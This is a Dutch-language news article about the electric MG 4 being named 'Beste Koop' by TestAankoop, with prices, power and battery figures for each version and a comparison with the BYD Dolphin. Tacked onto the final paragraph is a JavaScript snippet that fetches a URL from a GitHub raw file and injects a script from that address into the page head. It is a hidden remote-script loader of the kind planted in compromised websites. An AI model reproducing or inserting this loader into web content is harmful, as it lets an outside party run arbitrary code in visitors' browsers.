Het van oorsprong Britse MG is nog maar een viertal jaar opnieuw actief op de Europese markt. De Belgische invoerder is dan ook maar wat trots dat de volledig elektrische middenklasser door TestAankoop werd verkozen tot ‘Beste Koop’, nadat het model eind 2023 al zilver won bij de verkiezing VAB Gezinswagen van het jaar in de categorie EV’s tot 52.000 euro.
Betaalbaar
Nochtans heb je met dat budget nog heel wat over bij aankoop van een MG 4. Zo kost de basisversie van de compacte middenklasser van 4,29 meter met een vermogen van 170 pk een batterij van 51 kWh exclusief btw slechts 26.681,82 euro, terwijl zelfs de wellicht iets interessantere variant met 204 pk en 64 kWh zonder btw onder de drempel van 30.000 euro blijft.
En naast de Extended Range met 245 pk en 77 kWh (34.119,83 euro excl. btw) is er nog de vierwielaangedreven Xpower, waarvan het prijskaartje helemaal onklopbaar is: ondanks zijn vermogen van zo maar eventjes 435 pk kost deze topversie exclusief btw nog geen 35.000 euro… Bedragen waarvoor andere, met name Europese constructeurs alleen maar kleinere, minder krachtige en minder goed uitgeruste modellen kunnen aanbieden.
Zelfs in vergelijking met andere Chinese rivalen komt de MG 4 er goed uit: de instapversie van de BYD Dolphin is wel goedkoper, maar moet het dan stellen met een kleinere batterij en met een elektromotor van slechts 95 pk. Ook op die vlakken kreeg de MG 4 trouwens goede punten van TestAankoop, net als op die van wegligging en veiligheidsvoorzieningen. Zijn interessante prijskaartje was dus niet de enige troef die de MG 4 in de test naar voren kon schuiven – het model kan trouwens net als alle MG’s rekenen op een garantie van 7 jaar. (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)